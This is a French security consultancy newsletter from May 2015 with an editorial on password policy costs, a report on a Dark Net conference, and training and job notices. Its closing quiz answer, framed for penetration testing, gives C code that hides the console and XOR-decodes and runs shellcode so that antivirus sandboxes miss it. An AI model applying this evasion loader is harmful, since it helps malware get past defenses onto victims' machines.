[Newsletter HSC] N°129 - Mai 2015

Newsletter d'information de HSC newsletter at hsc-news.com
Mer 13 Mai 19:04:21 CEST 2015


========================================================================
              HSC Newsletter  --  N°129 --  mai 2015
========================================================================



           « Tout gouvernement a pour unique but le bien commun.
             Cet intérêt exige que les pouvoirs exécutifs, législatifs et
             judiciaires, soient distincts et définis, et que leur
             organisation assure la représentation libre des citoyens,
             la responsabilité des agents et l'impartialité des juges. »

                                        [ Marquis de La Fayette  ]





--[ Sommaire ]----------------------------------------------------------

      1. Éditorial
      2. Le saviez-vous ? La question
      3. Compte-rendu de la conférence du Clusif sur le Dark Net
      4. Livre : "La Sécurité Opérationelle" par Alexandre Fernandez-Toro
      5. Formation CIL d'HSC en 3 jours labellisée par la CNIL
      6. Offre d'emploi continuité d'activité
      7. Offres d'emploi HSC pour consultants en sécurité & continuité
      8. Agenda des interventions publiques
      9. Prochaines formations HSC
     10. Actualité des associations : Club 27001, OSSIR et Clusif
     11. Le saviez-vous ? La réponse



--[ 1. Editorial - Mikael Smaha  ]--------------------------------------

    La problématique des mots de passe et de leur récupération est sûrement
 l'un des sujets sécurité qui mobilise le plus de ressources, tant au niveau
 des attaquants que des défenseurs.

 Car nous faisons face à un véritable arsenal dans le domaine :
  * Ingénierie sociale et hameçonnage (phishing),
  * Collègue malveillant (dans des fonctions sensibles où la séparation
    des tâches est une obligation juridique),
  * Récupération et cassage des bases de mots de passe (distribuée ou non,
    par dictionnaire, rainbow table, force brute),
  * Récupération des entrées claviers (par observation, virus logiciel,
    périphérique d'interception, voire écoute électromagnétique)
  * Récupération des bases de mots de passe (en cache ou en base de données)
  * Réutilisation des bases qui fuitent sur Internet et notamment des
    couples login, email et mots de passe.

 Face à cette menace, le RSSI essaie souvent de riposter par une politique de
 mot de passe à la hauteur.
 En pratique une telle politique est tellement contraignante qu'elle est vouée
 à l'échec ; mais elle a en plus un coût qui est souvent sous-estimé.

 Non seulement par les nombreuses activités récurrentes qu'elle engendre :
  * Sensibilisation à la création de mots de passe forts,
  * Sensibilisation à la non-réutilisation de mot de passe personnel,
  * Sensibilisation à la non-communication du mot de passe,
  * Sensibilisation au verrouillage automatique du poste (le retrait du
    badge peut l'enclencher),
  * Audit des pratiques sur l'usage des mots de passe,
  * Audit des mots de passe,
  * Négociation pour intégrer une politique de mot de passe fort dans les
    applications auprès du métier,
  * Gestion de la perte du/des mots de passe.

 Mais également les implications liées à ces activités :
  * avec son cortège de règles contraignantes et omniprésentes,
    l'authentification par mot de passe colporte auprès des utilisateurs une
    image négative de la sécurité et du RSSI.
  * l'énergie dépensée par le RSSI à convaincre / persuader les utilisateurs
    du bien-fondé de ces règles.
  * l'attention et les capacités mémorielles mobilisées par les utilisateurs
    pour se remémorer ses mots de passe et les règles d'utilisation

 Et enfin parce que la protection par mot de passe laisse des risques résiduels
 importants.

 Pourtant, ce ne sont pas les alternatives qui manquent :
  * Simplification des usages par :
    - Solution de SSO (Compte lié à l'AD, O-Auth, CAS, authentification basée
      sur Facebook/Gmail)
    - Coffre fort électronique
  * Authentification forte
    - Biométrique
    - Par carte à puce / PICO / Token OTP
    - 3D Secure

     Si ces alternatives sont attrayantes, peu sont compatibles avec
 l'existant ; et les projets d'intégration échouent souvent à l'examen
 budgétaire.
 Pourtant prenons-nous le coût réel d'une protection par mots de passe lors
 de cet examen ?


 Note : pour un souci de concision, les problématiques liées aux comptes
 partagés et mots de passe par défaut ont été omises.



--[ 2. Le saviez-vous ? La question ]------------------------------------

     Lors d'un test d'intrusion, vous utilisez l'utilitaire msfvenom de
 la suite Metasploit afin de générer un logiciel malfaisant. Cependant,
 celui-ci est détecté par la plupart des antivirus du marché. Savez-vous
 quelle méthode de l'API interne de Windows peut-être utilisée pour les
 contourner ?

     Réponse au paragraphe 11.



--[ 3. Compte-rendu de la conférence du Clusif sur le Dark Net ]---------
    Pierre d'Huy, Amélie Paget et Hervé Schauer

     Cette conférence du Clusif sur le Deep Web et le Dark Net a été
 introduite par le président du CLUSIF Lazaro Pejsachowicz tenant à
 poser un contexte d'un milieu complexe utilisé certes par les "méchants"
 (sic) pour distribuer et gérer leurs outils, mais aussi par les "gentils"
 pour étudier les outils et les mécanismes de l'autre camp et de s'en
 prémunir. L'usage en est aussi pour les résistants, les journalistes, les
 entreprises...
 Les Dark Web posent une réflexion sur le besoin d'anonymat en démocratie
 non seulement au-delà de la volonté délictuelle mais également des risques
 venant de l'état.

 Visite guidée du DarkNet par François Paget, Intel Security / Clusif
 ------------------------
 Le Deep Web ou Web Invisible décrit les contenus Web non référencés, les
 sites cherchant volontairement à être dissimulés, ou des bases de données...
 Le Dark Net ou Web Sombre représente alors une part de ce réseau.
 Pour analyser le Dark Web, François Paget utilisé des environnements
 virtuels, soit avec I2P soit avec TOR.
 Le DarkNet est la place de nombreux marchés: financier (carding, fausse
 monnaie, faux papiers), contrebande (armes, cigarette, drogue), terrorisme
 (islamisme), mafieux (exécution, rapt, viol, chantage aux données), et la
 pédophilie. Les paiements ne se font qu'avec des monnaies virtuelles.
 Pour s'y retrouver dans cette galaxie de liens, il existe des moteurs de
 recherche (essentiellement des consortiums de vendeurs), Not Evil est l'un
 des plus intéressants bien que largement incomplet. Il est aussi possible de
 trouver rapidement une bonne quantité de liens en parcourant les pastebins.
 Le Darkweb existe aussi en français dans toutes ses formes.
 François Paget a conclu par deux questions:
     - Y a-t-il tout sur le darknet ? Oui
     - La marchandise est-elle vraiment au rendez-vous ? À en voir les
       chiffres du FBI, oui

 Dark Web enjeux et mesures par Anne Souvira, Préfecture de Police
 --------------------------
 Anne Souvira, commissaire divisionnaire chargée de mission auprès du préfet
 de Paris, nous a présenté une vision des Darknets basée sur son expérience
 d'enquêtes sur le sujet.
 Tout d'abord, Madame Souvira a présenté la différence entre les darknets et
 le deep web, en précisant la propriété privée des réseaux de type darknet.
 Elle nous a ensuite expliqué les différents types de délinquances que son
 cadre professionnel lui a permis de distinguer et nous a délivré une analyse
 logique de leur usage de ces réseaux en présentant les outils et les méthodes
 utilisées par les "hackers".
 Madame Souvira nous a rappelé que l'usage de Tor est légitime dans un
 cadre de protection des sources, mais qu'un usage lié à l'anonymat posait une
 situation de déloyauté vis-à-vis de l'État français, insistant sur la
 nécessité d'assurer la protection des citoyens en confiant la surveillance des
 réseaux aux instances administratives. Madame Souvira nous a assuré que nous
 pouvions avoir confiance en notre gouvernement, en effet nous accepterions
 déjà une surveillance par des instances privées (cookies).
 Madame Souvira a aussi illustré son propos par de nombreux exemples permettant
 de mettre en avant les menaces auxquelles seraient exposés les citoyens.
 Elle nous a présenté une vision très particulière des Darknets corroborant la
 thèse officielle du gouvernement et nous a rappelé la nécessité d'une
 surveillance globale.


 RSSI et Dark Web par Henri Codron, animateur de l'espace RSSI du Clusif
 ----------------
     Henru Codron présente une liste des menaces sur les réseaux SI (services
 vulnérables, hameçonnage) et présente la nécessité d'une veille et d'une
 analyse de risques régulières. Le Darknet permet de découvrir des menaces
 à l'avance à travers la recherche de signaux faibles. Il est nécessaire de
 surveiller pastebin. Henri Codron invite à la création d'une équipe de veille
 sur Tor. Cependant il est nécessaire de travailler sur la réputation.

 Dark Web Enjeux et Mesures par Benoît Mercier et Adrien Petit, CEIS
 --------------------------
 Benoît Mercier et Adrien Petit ont sommairement présenté leur solution
 commerciale qui s'appuie sur la théorie des Cyber Kill Chain de Lookeed
 Martin (2011), qui caractérise les 'APTs':
     - Reconnaissance
     - Armement
     - Livraison
     - Exploitation
     - Installation
     - Command and Control
     - Actions sur les objectifs
 Ils font de l'analyse de groupe, de paste de chan et de reddit.
 Ils agissent sur mandat pour obtenir la preuve de la fuite d'information
 et du délit.

     Prochaine conférence Clusif le 17 juin à 16h00 sur la sensibilisation
 en SSI.



--[ 4. Nouveau : publication du livre "La Sécurité Opérationelle" ]------

     Publication du livre "La Securite Opérationelle, conseils pratiques
 pour sécuriser le SI", par Alexandre Fernandez-Toro.

     Alexandre Fernandez-Toro intervient dans les formations ISO27001 d'HSC,
 et il est connu pour son premier ouvrage "Management de la Sécurité de
 l'Information, Implémentation des normes ISO-27001 et ISO-27002, et Audit
 de certification ". Il est RSSI dans un grand groupe français après
 avoir été consultant en sécurité pendant plus de dix ans chez HSC.
 Ces expériences lui ont donné un regard très opérationnel sur la sécurité
 des systèmes d'information et dans ce nouveau livre il en fait une synthèse
 unique.

     Pour sécuriser les systèmes d'information, certains agissent sur la
 technique alors que d'autres privilégient le management. Quelle que soit
 l'approche, les questions liées à la sécurité opérationnelle se posent très
 vite : quels processus mettre en place ? À quel niveau les gérer, comment
 les formaliser, comment s'assurer que ces processus fonctionnent
 correctement dans la durée ? Cet ouvrage, très pragmatique, donne des
 exemples concrets sur comment sécuriser un SI. Il liste les processus
 opérationnels à déployer en signalant les pièges concrets à éviter. Il
 comporte enfin un corpus documentaire complet avec des exemples de politiques
 et de procédures pouvant être appliqués en entreprise.

     Ce livre de 368 pages donne les clés pour améliorer de façon durable
 la maturité de la sécurité du SI.

 EAN13 : 9782212139631
http://www.eyrolles.com/Informatique/Livre/securite-operationnelle-9782212139631



--[ 5. Formation CIL d'HSC en 3 jours labellisée par la CNIL ]-----------

     Le Correspondant Informatique et Libertés (CIL), est une fonction clé
 au sein des entreprises, à la fois juridique et informatique, de plus en
 plus critique, au coeur de la gouvernance d'entreprise, des métiers et de
 la direction, qui impose un niveau d'expertise de plus en plus fort.
 Les enjeux informatiques et libertés sont aujourd'hui majeurs pour les
 entreprises, notamment en raison de la multiplication des contrôles de la
 CNIL (désormais réalisables à distance via Internet), et de l'arrivée
 prochaine du règlement européen sur les données personnelles, qui devrait
 considérablement renforcer les sanctions (100 millions d'euros ou 5% du
 chiffre d'affaires mondial au maximum) et imposer une vraie gouvernance de
 la conformité des données personnelles (études d'impact, privacy by design,
 etc.). Dans ce contexte, le CIL est aujourd'hui devenu un élément clé de
 la réduction du risque juridique et du développement de l'entreprise
 responsable.

     La formation "Correspondant Informatique et Libertés" conçue par HSC
 donne aux personnes exerçant ou devant exercer les fonctions de CIL les
 connaissances indispensables à l'accomplissement de leurs missions,
 en adoptant, ce qui fait sa spécificité, une approche résolument pratique
 et focalisée sur les aspects pragmatiques de l'exercice des fonctions
 (optimisation du recensement des traitements, tenue du registre, relations
 avec les tiers en interne et en externe, réactions à tenir face aux
 non-conformités et aux contrôles, etc.). Elle comporte de très nombreux
 exercices et cas pratiques, particulièrement appréciés des stagiaires, car
 correspondant précisément aux situations concrètes auxquelles ils sont ou
 seront confrontés dans leurs missions.

     La formation est conçue et dispensée par Frédéric Connes, docteur en
 droit et ingénieur en informatique, spécialisé depuis 6 ans en droit
 "Informatique & Libertés", et CIL lui-même.

     Depuis 2010, 113 personnes ont suivi la formation CIL interentreprises
 d'HSC avec un taux de satisfaction de 100%. La formation d'HSC a été la
 première formation CIL labellisée par la CNIL lors de la toute première
 session de labellisation tenue par la commission, en juin 2012, et elle
 vient d'être à nouveau labellisée pour sa version en 3 jours :
 http://www.cnil.fr/linstitution/labels-cnil/formations/
 La formation est également certifiée ISO9001 par Intertek et qualifiée OPQF
 (www.opqf.com).


     Prochaines sessions à Lyon du 5 au 7 mai et à Paris du 1er au 3 juillet.

 Objectifs, Pré-Requis, méthode pédagogique, plan détaillé et dates des
 formations en province disponibles sur :
 http://www.hsc-formation.fr/formations/cil.html.fr

     Pour tout renseignement et pour vous inscrire, contactez Lynda Benchikh
 formations at hsc.fr  --  +33 141 409 704



--[ 6. Offre d'emploi consultant en continuité d'activité ]--------------

     HSC by Deloitte recherche un consultant senior en continuité d'activité
 afin de développer l'offre et répondre aux demandes croissantes des clients
 sur l'ISO 22301.
 Les notions d'indépendance et de travail en équipe sont fondamentales chez
 HSC by Deloitte. Le candidat doit être passionné, aimer partager son
 expérience et être capable de faire progresser ses collègues sur son sujet
 de prédilection. Le consultant sélectionné pourra bénéficier de l'expérience
 d'HSC by Deloitte, considéré comme leader d'opinion sur l'ISO 27001 et la
 gestion des risques en sécurité.

 Avec le développement de l'offre « Continuité d'activité », le consultant
 sera en charge d'animer les formations ISO 22301 Lead Implementer, ISO 22301
 Lead Auditor et gestion de crise IT/SSI.

 Dans le cadre sa prise de fonction, il suivra les formations ci-dessus et
 d'autres comme ISO 27005 Risk manager et/ou des formations ISO27001.


     Le candidat devra justifier d'entre 5 et 10 ans d'expérience le sujet :
 BIA, stratégies de continuité, DRP, gestion de crise, plan de repli
 utilisateurs (PRU), exercices-tests, etc. Des connaissances avancées en
 sécurité des systèmes d'informations et/ou sur les systèmes de management
 constituent un avantage, mais ne sont pas indispensables.

 Le poste est basé à Neuilly-sur-Seine (Paris), au pied du métro Pont de
 Neuilly (ligne n° 1). Si vous souhaitez proposer votre candidature, nous
 vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx) par
 courrier électronique à  cv at hsc.fr.



--[ 7. Offres d'emploi HSC pour consultants en sécurité ]----------------

     HSC recherche des consultants brillants, débutants ou expérimentés,
 avides de partager et de s'épanouir dans une équipe indépendante,
 pluridisciplinaire, qui couvre tous les aspects liés à la sécurité et
 continuité, des tests d'intrusion à l'expertise judiciaire, de la
 rétro-ingénierie à la gouvernance, des systèmes industriels et embarqués à
 la gestion des risques, des technologies sans-fil à la résilience, de
 l'inforensique à l'ingénierie sociale, etc., pour des missions d'expertise
 variées et haut de gamme.

     Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC
 (intrusion, inforensique, Windows, SCADA, ISO27001, ISO22301, ISO27005,
 EBIOS, etc.), soit 2 à 6 semaines de formations suivies dans le cadre de
 la prise de fonction.

     HSC recherche également des stagiaires pour des stages de pré-embauche.

     Tous les postes sont basés à Neuilly-sur-Seine (Paris), au pied du métro
 Pont de Neuilly (ligne n° 1). Si vous souhaitez proposer votre candidature,
 nous vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx)
 par courrier électronique à cv at hsc.fr.



--[ 8. Agenda des interventions publiques ]--------------------------------

 - 30 mai 2015 - Journée ESIEA Secure Edition 2015 - Paris
   "Panorama sur la cybercriminalité 2014 du Clusif" par Hervé Schauer
   http://ese.esiea.fr/

 - 2 juin 2015 - Journée Technique ISO27001 du LNE - Paris
   "Conclusion de la journée" par Hervé Schauer
   http://www.lne.fr/campagnes/2015/JT1501.asp

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 9. Prochaines formations HSC ]----------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        PKI : principes et mise en oeuvre    ...    : 4 au 6 mai 2015 (*)
        ISO 27005 Risk Manager    ..............    : 11 au 13 mai (#)
        Essentiels Informatique et Liberté   ...    : 18 mai
        ISO 27001 Lead Implementer    ..........    : 18 au 22 mai (#)
        Essentiels juridiques pour gérer la SSI     : 21 et 22 mai
        Sécurité SCADA    ......................    : 27 au 29 mai
        Essentiel de PCI-DSS    ................    : 28 mai
        Inforensique réseau avancée (SANS FOR572)   : 1 au 5 juin (*)
        ISO 27001 Lead Auditor    ..............    : 1 au 5 juin (#)
        Analyse et investigation numérique avancées
        dans les réseaux (SANS FOR 572)    .....    : 1 au 5 juin (#)
        ISO 22301 Lead Implementer    ..........    : 8 au 12 juin (#)
        Tests d'intrusion des applications web et
        hacking éthique (SANS SEC542 / GIAC GWAPT)  : 8 au 12 juin (#)
        Formation CISSP    .....................    : 15 au 19 juin
        Mesures de sécurité ISO 27002:2013   ...    : 15 et 16 juin
        Indicateurs & tableaux de bord SSI/ISO27004 : 17 juin
        Gestion des incidents de sécurité/ISO27035  : 18 juin
        Gestion de crise IT/SSI    .............    : 19 juin 2015
        ISO 27005 Risk Manager    ..............    : 22 au 24 juin (#)
        ISO 27001 Lead Implementer    ..........    : 29 juin au 3 juillet (#)
        Correspondant Informatique et Libertés      : 1 au 3 juillet (@)
        ISO 27005 Risk Manager    ..............    : 9 au 11 septembre (#)
        Essentiels de l'ISO22301    ............    : 11 septembre
        Inforensique Windows (SANS FOR408/GIAC GCFE): 14 au 18 septembre (*)(#)
        Sécurité du Cloud Computing    .........    : 21 au 23 septembre
        Essentiels techniques de la SSI    .....    : 24 et 25 septembre
        Protéger les applis web (DEV522 /GIAC GWEB) : 28 sep au 2 oct (*)(#)
        Formation CISSP    .....................    : 12 au 16 octobre (#)
        ISO 22301 Lead Auditor    ..............    : 26 au 30 octobre (#)
        Fondamentaux & principes de la SSI
        (SANS SEC401/GIAC GSEC)   ..............    : 26 au 31 octobre (*)(#)
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 2 au 6 novembre (*)(#)
        EBIOS Risk Manager    ..................    : 3 au 5 novembre (#)
        RGS v2 : la SSI pour le secteur public      : 6 novembre
        Sécurité du WiFi    ....................    : 9 et 10 novembre (*)
        Inforensique ordiphones/tablettes (FOR585)  : 16 au 20 novembre (*)(#)
        Tests d'intrusion avancés des applications
        web et hacking éthique (SANS SEC642)  ...   : 23 au 27 novembre (*)
        Expert Sécurité Linux LPI 303   ........    : 23 au 27 novembre (*)(#)
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 14 au 18 décembre (*)(#)
        Risk Manager Avancé    .................    : 17 et 18 décembre

 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2, GIAC ou LPI
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : session de formation complète

 - Luxembourg
        Formation CISSP    .....................    : 18 au 22 mai (#)
        ISO 27005 Risk Manager    ..............    : 3 au 5 juin (#)
        ISO 27001 Lead Implementer    ..........    : 15 au 19 juin (#)
        ISO 22301 Lead Implementer    ..........    : 19 au 23 octobre (#)


 - Lille
        Correspondant Informatique et Libertés      : 16 au 18 mars 2015 (@)

 - Lyon
        Correspondant Informatique et Libertés      : 5 au 7 mai 2015 (@)

 - Marseille
        Correspondant Informatique et Libertés      : 22 au 24 avril 2015 (@)

 - Rennes
        Correspondant Informatique et Libertés      : 8 au 10 juin (@)

 - Strasbourg
        Correspondant Informatique et Libertés      : 22 au 24 juin (@)

 - Toulouse
        ISO 27001 Lead Implementer    ..........    : 12 au 16 octobre (#)
        Correspondant Informatique et Libertés .    : 4 au 6 novembre (@)
        ISO 27005 Risk Manager    ..............    : 19 au 21 novembre (#)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Intertek sur
 ses formations.

 Pour tout renseignement ou inscription, contactez Lynda Benchikh :
 formations at hsc.fr -- +33 158 379 042

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2015 en PDF sur http://www.hsc-formation.fr/



--[ 10. Actualité des associations : Club 27001, OSSIR et Clusif ]--------

  o Club 27001 (http://www.club-27001.fr/)
     . Prochaine réunion à Paris jeudi 21 mai 2015
         - "Retour d'expérience sur la mise en oeuvre de SMSI dans un
           contexte étranger" par Ramesh Pavadepoulle, Dell Secureworks
         - Seconde présentation en cours de confirmation
     . Autres prochaines réunions annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 12 mai à l'INRIA
         - Évaluation de la sécurité des fournisseurs IT dans le cadre du
           référencement par Jean-Philippe Gaulier  (Orange)
         - Les attaques de skimming par Thomas Souvignet (Gendarmerie)
         - Revue de vulnérabilités
     . Réunion suivante à Paris le mardi 9 juin à l'INRIA
         - "Firewall SCADA certifié" par Pascal Sitbon (SecLab Solutions)
         - "SSL" par Karthikeyan Bhargavan (INRIA)
         - Revue de vulnérabilités
     . Réunion suivante à Paris le mardi 7 juillet à l'INRIA
         - "Investigation sur les intrusions physiques du SI" par
           Alexandre Triffault (OFC)
         - Programme en cours de confirmation
     . Prochaine réunion à Toulouse mardi 23 juin
         - "Bitcoins : principes, fonctionnement et utilisation" par Stéphane
           Tonelli et Patrice Reveillac (Gendarmerie)
         - Seconde présentation en cours de confirmation
     . Prochaine réunion à Rennes non planifiée.

 o Clusif (http://www.clusif.fr/)
     . Prochaine conférence le 17 juin sur la sensibilisation à la SSI à
       16h00 à la CCI place de la Bourse.
       http://www.clusif.fr/



--[ 11. Le saviez-vous ? La réponse ]------------------------------------

     Dans un premier temps, il est nécessaire de connaître la spécificité de
 la fonction rand[1] sous Windows. En effet, celle-ci doit retourner un nombre
 pseudo-aléatoire. Cependant, si aucune graine n'est en place (au travers de
 l'utilisation de srand[2]), le retour de cette fonction est constant.

     Il est alors très facile, de contourner les antivirus en prenant cela en
 compte. En effet, ceux-ci exécutent les programmes au sein d'un bac à sable
 en simulant les appels aux API Windows. Cependant, l'utilisation de cette
 fonction permet de contourner ce bac à sable et le blocage de l'exécution du
 binaire.

 Voici un exemple d'utilisation pour lequel nous avons réalisé un XOR de
 notre shellcode avec la valeur retourné par rand.

 unsigned char payload = "PAYLOAD";
 int main(int argc, char **argv){
     HWND hWnd = GetConsoleWindow();
     if(hWnd){
         ShowWindow (hWnd, FALSE);
     }
     int random = rand();
     int i;
     for(i=0;i<sizeof(payload);i++){
         payload[i] ^= random;
     }
     ((void (*)())payload)();
     return 0;
 }



Plus d'informations sur la liste de diffusion newsletter